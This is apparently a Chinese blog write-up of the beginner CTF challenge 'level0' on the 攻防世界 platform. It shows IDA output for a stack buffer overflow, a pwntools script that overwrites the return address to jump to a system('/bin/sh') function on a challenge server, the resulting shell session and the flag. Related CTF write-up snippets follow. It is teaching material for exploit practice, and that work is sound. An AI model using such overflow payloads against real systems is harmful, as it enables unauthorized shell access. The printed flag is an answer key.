攻防世界-wp-PWN-新手区-1-level0

最新推荐文章于 2022-05-27 18:27:12 发布
最新推荐文章于 2022-05-27 18:27:12 发布
阅读量544 收藏 2
点赞数 1
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45161658/article/details/112659988
版权

题目来源:

XMan

题目描述:

菜鸡了解了什么是溢出,他相信自己能得到shell

题目场景:

220.249.52.133:48442

题目附件:

291721f42a044f50a2aead748d539df0

题目思路:

直接栈溢出,题目给了参数为/bin/sh的callsystem函数在0x400596

解题过程:

载入IDA64,找到main函数F5反编译得到伪C代码,一行打印,一行输入,进入vulnerable_function函数。

ssize_t vulnerable_function(){
  char buf; // [rsp+0h] [rbp-80h]
  return read(0, &buf, 0x200uLL);
}

buf这个字符数组的长度只有0x80,而我们可以输入0x200的东西,能覆盖掉数组外面的东西。当属于数组的空间结束后,有一个0x8个字节长度的s,其次是一个存放着返回地址的r。我们可以输入数据,覆盖到返回地址r。

-0000000000000080 ; D/A/*   : change type (data/ascii/array)
-0000000000000080 ; N       : rename
-0000000000000080 ; U       : undefine
-0000000000000080 ; Use data definition commands to create local variables and function arguments.
-0000000000000080 ; Two special fields " r" and " s" represent return address and saved registers.
-0000000000000080 ; Frame size: 80; Saved regs: 8; Purge: 0
-0000000000000080 buf             db ?
......
-0000000000000001                 db ? ; undefined
+0000000000000000  s              db 8 dup(?)
+0000000000000008  r              db 8 dup(?)
+0000000000000010 ; end of stack variables

_system函数拥有系统的最高权限,参数为/bin/sh可以提供终端,从而控制系统。左侧的函数列表找到callsystem,地址是0x400596把他写到返回地址r上,在数组结束后直接返回到callsystem函数上。

.text:0000000000400596                         ; Attributes: bp-based frame
.text:0000000000400596                                         public callsystem
.text:0000000000400596                         callsystem      proc near
.text:0000000000400596                         ; __unwind {
.text:0000000000400596 55                                      push    rbp
.text:0000000000400597 48 89 E5                                mov     rbp, rsp
.text:000000000040059A BF 84 06 40 00                          mov     edi, offset command ; "/bin/sh"
.text:000000000040059F E8 BC FE FF FF                          call    _system
.text:00000000004005A4 5D                                      pop     rbp
.text:00000000004005A5 C3                                      retn
.text:00000000004005A5                         ; } // starts at 400596
.text:00000000004005A5                         callsystem      endp

解释一下汇编:x64和x32的汇编参数存放的位置不同,32位存在栈里,直接压入四个随意字节,再压入_system的参数地址,而64位优先存在寄存器里,所以需要把/bin/sh复制到寄存器里,然后再调用_system。脚本:

from pwn import *
p = remote("220.249.52.133", 48442)
payload = 'A' * 0x80 + 'a' * 0x8 + p64(0x00400596)
p.recvuntil("Hello, World\n")#当接收数据后
p.sendline(payload)
p.interactive()

运行脚本时把中文去掉

giantbranch@ubuntu:~/Desktop$ python 1.py 
[+] Opening connection to 220.249.52.133 on port 48442: Done
[*] Switching to interactive mode
$ cat flag
cyberpeace{6ec99dbcb629f24001684356904b3c37}

cyberpeace{6ec99dbcb629f24001684356904b3c37}

攻防世界 pwn 新手练习 level0
ChaoYue_miku的博客
07-01 595
题目来源: XMan 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 0、根据题目描述,猜测是栈溢出漏洞,使用checksec检查保护机制,同时运行一下文件。 64位文件,开启了NX保护 1、使用IDA 64 Pro打开文件 read()函数明显存在栈溢出漏洞,buf距离栈底0x80个字节,然而read函数可以读取0x200个字节,查看一下栈结构。 这里可以覆盖返回地址,执行需要的函数 发现存在callsystem()函数,将返回值跳转到这个函数,可以直接getshell, 查看一下函数地址
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 611
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
攻防世界 pwn 二进制漏洞简单题练习 答题(1-10题解)
小哈里的博客
01-12 5659
序 1、level0 题目描述:菜鸡了解了什么是溢出,他相信自己能得到shell 题目思路: 首先使用checksec检查文件保护机制,是多少位的程序。 64位程序,栈不能执行 继续丢入IDA。 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互。 进入vulnerable_function函数,通过伪代码分析逻辑,发现了栈溢出漏洞。 发现buf数组只有0x80字节,但是read函数从中读了0x200个。 或许咱们能够进行溢出,覆盖掉返回地址,
BUUCTF Pwn rip
weixin_41557838的博客
05-27 376
BUUCTF Pwn rip
攻防世界_leve0
RMC131的博客
03-06 4523
checksec 有点不大明白,之前checksec直接checksec filename就可以,现在变了样,索性就再记一记(参考checksec安装与使用)这个里面结尾有点意思:pwn题到手,checksec一下,file一下,nc一下,IDA一下 sudo apt install checksec 我用的是kali2022.1+阿里源,没有任何毛病 之前一直是这样用的,现在试了不行,就查了下 checksec使用 好像提示也够明显哈 类型一 normal (or --format=cli) che
adworld攻防世界-pwn-新手-wp
令则
03-05 1198
adworld-pwn-新手 tcl 到现在才算是正经昨晚攻防世界的pwn新手, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 711
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
[CTF-PWN]攻防世界新手村-level0[wp]
murongxuege的博客
10-03 2095
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,64字节,x86也就是amd64微处理器。 checksec的常用命令是:
pwn攻防世界 pwn新手wp
woodwhale的博客
08-10 7298
pwn攻防世界 pwn新手wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
攻防世界pwn之note-service
qq_42728977的博客
01-09 901
写在前面:最近在准备期末考试,姑且是这个理由吧,pwn和re都停了一个月了,感觉自己不够持之以恒,本来说还得一天一道题,给搁置了一个多月了,pwn和re这东西,不进则退,搞得我很难受,本来想的是,这个学期有点成绩,但是现在看来才是刚入门,而且还要复习考研,时间和精力会更少。喜欢pwn和re是因为自己很喜欢从原理搞清楚一个事情。不多啰嗦了,开始写wp了。 题目:note-service 原题是CIS...
CTF PWN入坑
Alan-WalkBill的博客
11-17 3246
CTF PWN入门(一) 1.攻防世界get_shell 将下载好的附件用在Linux中打开命令是./ 文件名 发现没有权限,原来需要先添加权限可使用chmod +x ./ 文件名。 然后nc -nv 111.198.29.45 55973链接到远程主机 ***更多chmod介绍https://www.cnblogs.com/peida/archive/2012/11/29/2794010.htm...
Xman pwn level0 writeup
qq_39596232的博客
08-23 1629
题目描述: 菜鸡了解了什么是溢出,他相信自己能得到shell 解题思路: 1、拿到文件,首先查看一下文件类型: tucker@ubuntu:~/pwn$ file level0 level0: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, fo...
攻防世界新手pwn
ca1m4n的博客
11-03 737
攻防世界新手pwnget_shellexp get_shell 首先checksec一下 64位 只开启了栈可执行保护 ida打开 看主函数,好大一个system(/bin/sh) 然后puts和binsh地址差就是偏移量 exp rom pwn import * m=remote('220.249.52.133',xxxxx) binsh = 0x400574 payload='a'*(0x3a-0x18) +p64(binsh) m.sendline(payload) m.interactive()
红帽杯pwn1+Xman level3 wp
weixin_44031198的博客
11-24 270
1 ROP 这两道题的核心思想是ROP,ROP(返回导向编程),通俗的说,就是溢出后使用返回函数跳转到目标。一般来说,ROP应用在不能直接shellcode的情况下(NX开启时shellcode不能写入内存),具体了解ROP见wiki。 2 pwn1分析 检查程序:开启NX保护,不能写shellcode;32位linux 看代码:发现一个scanf,输入写在内存,考虑通过scanf控制...
pwn level3
weixin_45677731的博客
03-15 561
解压之后有一个level3和libc_32.so.6,拖进ida(32位) 主要就是这两个函数,一个write和一个read 这道题的基本思路就是通过第一次溢出将write函数在got表中的地址泄露,然后减去在libc_32.so.6中的偏移,得到基地址,在加上ibc_32.so.6中找到的system和"/bin/sh"偏移得到真实的地址,然后再执行一次main函数进行第二次溢出 对于writ...
第62天:2019Xman冬令营选拔赛部分writeup
S1lenc3的博客
12-31 837
Mobile 直接拖入JEB, 标准的输入和提交。 然后把输入框的值赋给passt和flagt。分别是Long和string 然后判断flagt是否为空,最后调用原生方法check。 啥都不用想,直接解压上IDA。 Arm汇编压根不会,直接看伪代码猜吧。 这三个估计就是调用Factor类的factor方法,参数是passt。 然后继续走到下一个函数。 a5...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Scorpio-m7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值